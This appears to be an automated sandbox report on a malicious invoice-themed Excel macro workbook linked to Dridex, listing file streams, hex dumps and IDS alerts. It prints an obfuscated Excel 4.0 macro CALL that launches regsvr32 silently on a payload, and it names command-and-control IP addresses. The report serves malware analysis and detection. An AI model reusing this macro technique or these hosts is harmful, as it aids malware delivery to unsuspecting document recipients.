                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . x . k . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . " . v i e w _ 1 _ a , 1 , 0 , M S F o r m s , M u l t i P a g e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . .
                                                                                                                                      Data Raw:01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 fb 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                      VBA Code Keywords

                                                                                                                                      Keyword
                                                                                                                                      Index
                                                                                                                                      VB_Name
                                                                                                                                      VB_Creatable
                                                                                                                                      Application.OnTime
                                                                                                                                      VB_Exposed
                                                                                                                                      Long)
                                                                                                                                      ResizePagess()
                                                                                                                                      VB_Customizable
                                                                                                                                      "REviewsd"
                                                                                                                                      VB_Control
                                                                                                                                      MultiPage"
                                                                                                                                      VB_TemplateDerived
                                                                                                                                      MSForms,
                                                                                                                                      False
                                                                                                                                      Attribute
                                                                                                                                      Private
                                                                                                                                      VB_PredeclaredId
                                                                                                                                      VB_GlobalNameSpace
                                                                                                                                      VB_Base
                                                                                                                                      ResizePagess
                                                                                                                                      "pages"
                                                                                                                                      VBA Code
                                                                                                                                      VBA File Name: ThisWorkbook.cls, Stream Size: 999
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/ThisWorkbook
                                                                                                                                      VBA File Name:ThisWorkbook.cls
                                                                                                                                      Stream Size:999
                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                      VBA Code Keywords

                                                                                                                                      Keyword
                                                                                                                                      False
                                                                                                                                      VB_Exposed
                                                                                                                                      Attribute
                                                                                                                                      VB_Name
                                                                                                                                      VB_Creatable
                                                                                                                                      "ThisWorkbook"
                                                                                                                                      VB_PredeclaredId
                                                                                                                                      VB_GlobalNameSpace
                                                                                                                                      VB_Base
                                                                                                                                      VB_Customizable
                                                                                                                                      VB_TemplateDerived
                                                                                                                                      VBA Code

                                                                                                                                      Streams

                                                                                                                                      Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 550
                                                                                                                                      General
                                                                                                                                      Stream Path:PROJECT
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Stream Size:550
                                                                                                                                      Entropy:5.28107922141
                                                                                                                                      Base64 Encoded:True
                                                                                                                                      Data ASCII:I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 0 - D B B 2 9 D 5 C 1 4 7 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E E E C 1 D 3 1 E 5 F 1 D 7 F 5 D 7 F 5 D 7 F 5 D 7 F 5 " . . D P B = " D C D E 2 F 3 F F 3 2 C F 4 2 C F 4 2 C "
                                                                                                                                      Data Raw:49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 30 2d 44 42 42 32 39 44 35 43 31 34 37 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d
                                                                                                                                      Stream Path: PROJECTwm, File Type: data, Stream Size: 86
                                                                                                                                      General
                                                                                                                                      Stream Path:PROJECTwm
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:86
                                                                                                                                      Entropy:3.24455457963
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                                                                                                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                                                                                                                                      Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/_VBA_PROJECT
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:3574
                                                                                                                                      Entropy:4.45079869926
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                                                                                                                                      Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                      Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/__SRP_0
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:2060
                                                                                                                                      Entropy:3.45011283232
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . Y . n . M . . . W . . v _ . . . . . . . .
                                                                                                                                      Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                                                                                      Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/__SRP_1
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:187
                                                                                                                                      Entropy:1.91493173134
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . .
                                                                                                                                      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00
                                                                                                                                      Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/__SRP_2
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:363
                                                                                                                                      Entropy:2.21122978445
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      Data Raw:72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                      Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/__SRP_3
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:398
                                                                                                                                      Entropy:2.07709195049
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . .
                                                                                                                                      Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                      Stream Path: VBA/dir, File Type: data, Stream Size: 820
                                                                                                                                      General
                                                                                                                                      Stream Path:VBA/dir
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:820
                                                                                                                                      Entropy:6.49145935167
                                                                                                                                      Base64 Encoded:True
                                                                                                                                      Data ASCII:. 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                                                      Data Raw:01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 09 a2 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                                                      Macro 4.0 Code

                                                                                                                                      CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)

                                                                                                                                      "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                                                                                                                                      OLE File "/opt/package/joesandbox/database/analysis/338309/sample/INV2680371456-20210111889374.xlsm"

                                                                                                                                      Indicators

                                                                                                                                      Has Summary Info:False
                                                                                                                                      Application Name:unknown
                                                                                                                                      Encrypted Document:False
                                                                                                                                      Contains Word Document Stream:
                                                                                                                                      Contains Workbook/Book Stream:
                                                                                                                                      Contains PowerPoint Document Stream:
                                                                                                                                      Contains Visio Document Stream:
                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                      Flash Objects Count:
                                                                                                                                      Contains VBA Macros:False

                                                                                                                                      Summary

                                                                                                                                      Author:
                                                                                                                                      Last Saved By:
                                                                                                                                      Create Time:2020-12-07T14:38:21Z
                                                                                                                                      Last Saved Time:2021-01-11T14:32:26Z
                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                      Security:0

                                                                                                                                      Document Summary

                                                                                                                                      Thumbnail Scaling Desired:false
                                                                                                                                      Company:
                                                                                                                                      Contains Dirty Links:false
                                                                                                                                      Shared Document:false
                                                                                                                                      Changed Hyperlinks:false
                                                                                                                                      Application Version:16.0300

                                                                                                                                      Streams

                                                                                                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                                                                                                      General
                                                                                                                                      Stream Path:\x1CompObj
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:115
                                                                                                                                      Entropy:4.80096587863
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Stream Path: f, File Type: data, Stream Size: 178
                                                                                                                                      General
                                                                                                                                      Stream Path:f
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:178
                                                                                                                                      Entropy:2.56223021678
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
                                                                                                                                      Data Raw:00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 00 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                                                      General
                                                                                                                                      Stream Path:i02/\x1CompObj
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:110
                                                                                                                                      Entropy:4.63372611993
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Stream Path: i02/f, File Type: data, Stream Size: 40
                                                                                                                                      General
                                                                                                                                      Stream Path:i02/f
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:40
                                                                                                                                      Entropy:1.54176014818
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Stream Path: i02/o, File Type: empty, Stream Size: 0
                                                                                                                                      General
                                                                                                                                      Stream Path:i02/o
                                                                                                                                      File Type:empty
                                                                                                                                      Stream Size:0
                                                                                                                                      Entropy:0.0
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:
                                                                                                                                      Data Raw:
                                                                                                                                      Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                                                      General
                                                                                                                                      Stream Path:i03/\x1CompObj
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:110
                                                                                                                                      Entropy:4.63372611993
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Stream Path: i03/f, File Type: data, Stream Size: 40
                                                                                                                                      General
                                                                                                                                      Stream Path:i03/f
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:40
                                                                                                                                      Entropy:1.90677964945
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                      Stream Path: i03/o, File Type: empty, Stream Size: 0
                                                                                                                                      General
                                                                                                                                      Stream Path:i03/o
                                                                                                                                      File Type:empty
                                                                                                                                      Stream Size:0
                                                                                                                                      Entropy:0.0
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:
                                                                                                                                      Data Raw:
                                                                                                                                      Stream Path: o, File Type: data, Stream Size: 152
                                                                                                                                      General
                                                                                                                                      Stream Path:o
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:152
                                                                                                                                      Entropy:2.68720470607
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
                                                                                                                                      Data Raw:00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80
                                                                                                                                      Stream Path: x, File Type: data, Stream Size: 48
                                                                                                                                      General
                                                                                                                                      Stream Path:x
                                                                                                                                      File Type:data
                                                                                                                                      Stream Size:48
                                                                                                                                      Entropy:1.42267983198
                                                                                                                                      Base64 Encoded:False
                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                      Data Raw:00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

                                                                                                                                      Macro 4.0 Code

                                                                                                                                      CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)

                                                                                                                                      "=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

                                                                                                                                      Network Behavior

                                                                                                                                      Snort IDS Alerts

                                                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                      01/12/21-01:43:58.265168TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434916677.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:01.015768TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084916880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:01.606814TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491695.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:01.606814TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491695.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:02.725135TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917177.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:03.248611TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084917280.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:03.773777TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491735.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:03.773777TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491735.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:04.816543TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917577.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:05.342645TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084917680.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:05.861566TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491775.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:05.861566TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491775.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:06.899440TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434917977.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:07.433882TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918080.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:07.976250TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491815.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:07.976250TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491815.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:09.036133TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918377.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:09.566865TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918480.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:10.076718TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491855.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:10.076718TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491855.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:11.132100TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434918777.220.64.37192.168.2.22
                                                                                                                                      01/12/21-01:44:11.645475TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084918880.86.91.27192.168.2.22
                                                                                                                                      01/12/21-01:44:12.172173TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491895.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:12.172173TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389491895.100.228.233192.168.2.22
                                                                                                                                      01/12/21-01:44:13.200539TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434919177.220.64.37192.168.2.22
